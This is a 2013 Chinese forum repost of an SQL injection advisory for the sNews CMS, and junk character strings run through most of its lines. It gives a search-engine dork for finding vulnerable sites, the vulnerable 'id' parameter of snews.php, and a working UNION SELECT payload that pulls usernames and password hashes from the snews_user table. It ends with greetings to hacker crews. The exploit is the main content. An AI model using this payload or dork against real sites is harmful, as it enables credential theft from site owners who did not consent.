标题: CMS snews SQL Injection Vulnerability
Q0 [6 r: U8 Q& W: H) y5 }作者: By onestree
* L; M2 f$ F2 o9 |* g下载地址 : http://snewscms.com/
) P7 @' ?. ]7 ^; }, i" |( k测试平台 : ubuntu 12.10 / win 7: D# x$ q" \3 G; b
关键词: inurl:"tanyakan pada rumput yang bergoyang"
2 a; m5 c% J4 R& {0 c7 S
5 l( i5 P0 F- Y 2 S# E8 h7 y1 k
*************************************************************
0 k9 j; j6 Y1 R6 H$ [ * n( Z8 S# _7 C0 U% O
SQL poc:# R9 e# }$ E9 m
- M- P$ ?; m. w* J/ y+ `& O4 {http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]. n$ o7 I! I! i
) Y: k1 ]/ r) k& P" w
示例$ i" b, S' ~4 y5 J1 {" J5 ^4 \
8 ~/ d) o' H" S5 ?# O6 hhttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
8 s) E$ o; U# m9 R6 e) V7 Z* u; ^
$ @1 `) p8 M3 W& Y) b $ T% z7 ]& d1 C$ S9 @9 C& _
致谢:6 |! L, J$ L+ v. T
. s4 b/ W$ `3 |4 f n- P6 s Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell$ ]6 s: x) U: M. [* Y& d4 G: z& p* p
# }' }& D/ m2 ~- h$ N) m8 j9 P/ R; U indonesiancoder - moeslimh4x0r - go-coder) o/ z/ q2 ~& G8 z! m
: ^ s; H' k; ~3 U+ Yspesial my hunny :*9 Y* I9 i6 m& B/ t4 c, p9 N
|
发表于 2013-1-23 08:55:06
收藏
支持
反对